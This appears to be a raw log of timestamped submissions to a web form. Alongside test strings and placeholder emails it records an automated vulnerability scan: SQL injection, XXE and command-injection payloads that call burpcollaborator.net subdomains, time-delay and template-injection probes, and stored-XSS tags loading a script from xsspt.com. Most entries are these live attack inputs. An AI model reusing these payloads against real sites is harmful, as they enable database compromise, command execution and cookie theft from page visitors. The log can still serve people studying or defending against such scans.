1566265638.7728176:	可视化好难看

1566357688.841896:	<script src=https://xsspt.com/etoG1I></script>

1566390199.7115598:	lhgb ojiblkj

1566443988.995472:	555-555-0199@example.com

1566444152.4909842:	555-555-0199@example.com

1566444152.7674766:	555-555-0199@example.com

1566444156.7551613:	1dabgcq9iq

1566444159.5760202:	555-555-0199@example.comw96hkcm9f9

1566444159.8195348:	(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % qdwkl SYSTEM "http://utr7lruyztq2sy32wy89pv85nwtphs5ksagz.burpcollab'||'orator.net/">%qdwkl;]>'),'/l') from dual)

1566444160.4148:	555-555-0199@example.com'||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % qdwkl SYSTEM "http://jwjwogxn2itrvn6rznbyskbuqlweki8av0jp.burpcollab'||'orator.net/">%qdwkl;]>'),'/l') from dual)||'

1566444160.7643452:	555-555-0199@example.com;declare @q varchar(99);set @q='\\6y5jq3za45vexa8e1adlu7dhs8y1mscg43urj.burpcollab'+'orator.net\iju'; exec master.dbo.xp_dirtree @q;-- 

1566444161.075574:	555-555-0199@example.com';declare @q varchar(99);set @q='\\q9031naufp6y8ujycuo55ro13s9lxco0gn6bv.burpcollab'+'orator.net\nef'; exec master.dbo.xp_dirtree @q;-- 

1566444161.3574479:	555-555-0199@example.com);declare @q varchar(99);set @q='\\0nodfxo4tzk8m4x8q42fj12bh2nvbm3avxlla.burpcollab'+'orator.net\xlx'; exec master.dbo.xp_dirtree @q;-- 

1566444161.6938736:	555-555-0199@example.com');declare @q varchar(99);set @q='\\rgb48ohvmqdzfvqzjvv6csv2atgm4dx1pofc4.burpcollab'+'orator.net\yuu'; exec master.dbo.xp_dirtree @q;-- 

1566444162.0153646:	(select load_file('\\\\402hs11863xcz8ac38fjw5ffu60zoqqei18px.burpcollaborator.net\\rsb'))

1566444162.5251806:	555-555-0199@example.com'+(select load_file('\\\\q2t3un3u8pzy1ucy5uh5yrh1ws2lqct0lnbb0.burpcollaborator.net\\udu'))+'

1566444162.9830177:	555-555-0199@example.com'

1566444163.3037395:	555-555-0199@example.com'(select*from(select(sleep(20)))a)'

1566444164.0521255:	555-555-0199@example.com'+(select*from(select(sleep(20)))a)+'

1566444164.4751642:	555-555-0199@example.com' and (select*from(select(sleep(20)))a)-- 

1566444164.840638:	555-555-0199@example.com,(select*from(select(sleep(20)))a)

1566444165.1267352:	555-555-0199@example.com' waitfor delay'0:0:20'--

1566444165.867561:	555-555-0199@example.com')waitfor delay'0:0:20'--

1566444166.2153234:	555-555-0199@example.com',0)waitfor delay'0:0:20'--

1566444166.527053:	555-555-0199@example.com10697217' or '8063'='8063

1566444166.9432206:	555-555-0199@example.com10066853' or '4403'='4397

1566444167.3075612:	555-555-0199@example.com10172958' or 9312=9312-- 

1566444167.612495:	555-555-0199@example.com50619149' or 6048=6044-- 

1566444168.0224006:	555-555-0199@example.com' and '3843'='3843

1566444168.5304976:	555-555-0199@example.com' and '2628'='2620

1566444169.003728:	555-555-0199@example.com' and 2568=2568-- 

1566444169.500541:	555-555-0199@example.com' and 8779=8772-- 

1566444169.7685268:	555-555-0199@example.com"

1566444170.0722911:	zegct${635*527}a3hkb

1566444170.4483628:	bd2fe{{479*745}}ivdyp

1566444170.836293:	555-555-0199@example.com}}vao0n'/"<rt21p

1566444171.3430727:	555-555-0199@example.com%}i1yzm'/"<q7lof

1566444171.6603336:	555-555-0199@example.combezww%>nhrpl'/"<gif9e

1566444172.0125785:	555-555-0199@example.com'+sleep(20.to_i)+'

1566444172.8955717:	555-555-0199@example.com'+eval(compile('for x in range(1):\n import time\n time.sleep(20)','a','single'))+'

1566444173.1031253:	eval(compile('for x in range(1):\n import time\n time.sleep(20)','a','single'))

1566444173.437136:	555-555-0199@example.com'.sleep(20).'

1566444173.7357252:	555-555-0199@example.com{${sleep(20)}}

1566444174.071537:	http://8hql95icn7eggcrgkcwnd9wjbah35ttlgb40.burpcollaborator.net?555-555-0199@example.com

1566444174.5152917:	555-555-0199@example.com|nslookup -q=cname nlc0dkmrrmivkrvvor02ho0yfpli9ex6kw8l.burpcollaborator.net.&

1566444175.107515:	555-555-0199@example.com'"`0&nslookup -q=cname 3w0go0x722tbv76bz7bis4beq5wykv8nvdj2.burpcollaborator.net.&`'

1566444175.3431358:	555-555-0199@example.com&nslookup -q=cname 96dmy67dc83h5dgh9dlo2alk0b64uzir5ht6.burpcollaborator.net.&'\"`0&nslookup -q=cname 96dmy67dc83h5dgh9dlo2alk0b64uzir5ht6.burpcollaborator.net.&`'

1566444176.1874092:	555-555-0199@example.com|echo np2udcm3bc 17qdmp37j5||a #' |echo np2udcm3bc 17qdmp37j5||a #|" |echo np2udcm3bc 17qdmp37j5||a #

1566444176.387601:	555-555-0199@example.com&echo c2d1ewnowa l9iluzo0f8&

1566444176.6268475:	555-555-0199@example.com"|echo cw64ec9eq8 zrgwt04emm ||

1566444176.8270395:	555-555-0199@example.com'|echo o1bhupcun8 ru5ai3tl3q #xzwx

1566444177.3445177:	555-555-0199@example.com|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1

1566444180.5759768:	555-555-0199@example.com|ping -c 21 127.0.0.1||x

1566467970.1571696:	555-555-0199@example.com

1566467970.9533827:	555-555-0199@example.com

1566467971.2105052:	555-555-0199@example.com

1566467971.4963143:	555-555-0199@example.com

1566467971.6943915:	555-555-0199@example.com

1566467971.9374683:	555-555-0199@example.com

1566467972.114697:	555-555-0199@example.com

1566467972.5149143:	555-555-0199@example.com

1566467973.0436044:	555-555-0199@example.com

1566467973.2766948:	555-555-0199@example.com

1566467973.5321853:	555-555-0199@example.com

1566467973.6833348:	555-555-0199@example.com

1566467973.92069:	555-555-0199@example.com

1566467974.1299026:	555-555-0199@example.com

1566467974.4722533:	555-555-0199@example.com

1566467974.6258662:	555-555-0199@example.com

1566467974.805913:	555-555-0199@example.com

1566467975.2189586:	555-555-0199@example.com

1566467975.515928:	555-555-0199@example.com

1566467975.830121:	555-555-0199@example.com

1566467976.0640583:	555-555-0199@example.com

1566467976.408144:	555-555-0199@example.com

1566467976.8136907:	555-555-0199@example.com

1566467977.0042207:	555-555-0199@example.com

1566467977.216729:	555-555-0199@example.com

1566467977.6148672:	555-555-0199@example.com

1566467977.805471:	555-555-0199@example.com

1566467978.0096858:	555-555-0199@example.com

1566467978.3106227:	555-555-0199@example.com

1566467978.700174:	555-555-0199@example.com

1566467979.030497:	555-555-0199@example.com

1566467979.4961956:	555-555-0199@example.com

1566467979.6225622:	555-555-0199@example.com

1566467979.9733746:	555-555-0199@example.com

1566467980.3730657:	555-555-0199@example.com

1566467980.582574:	555-555-0199@example.com

1566467980.8322384:	555-555-0199@example.com

1566467981.047101:	555-555-0199@example.com

1566467981.2960443:	555-555-0199@example.com

1566467984.3800151:	555-555-0199@example.com

1566467984.889448:	555-555-0199@example.com

1566531416.6314015:	</textarea><script src=https://xsspt.com/etoG1I></script><textarea>

1566531441.2775714:	</div><script src=https://xsspt.com/etoG1I></script><div>

1566531545.5241745:	</text><script src=https://xsspt.com/etoG1I></script><text>

1566821417.3388:	史蒂夫个

1566821591.8379738:	阿斯顿法国进口厉害的

1568631146.581559:	sdflgjks

1568736075.6092181:	kkp

1568736086.232492:	

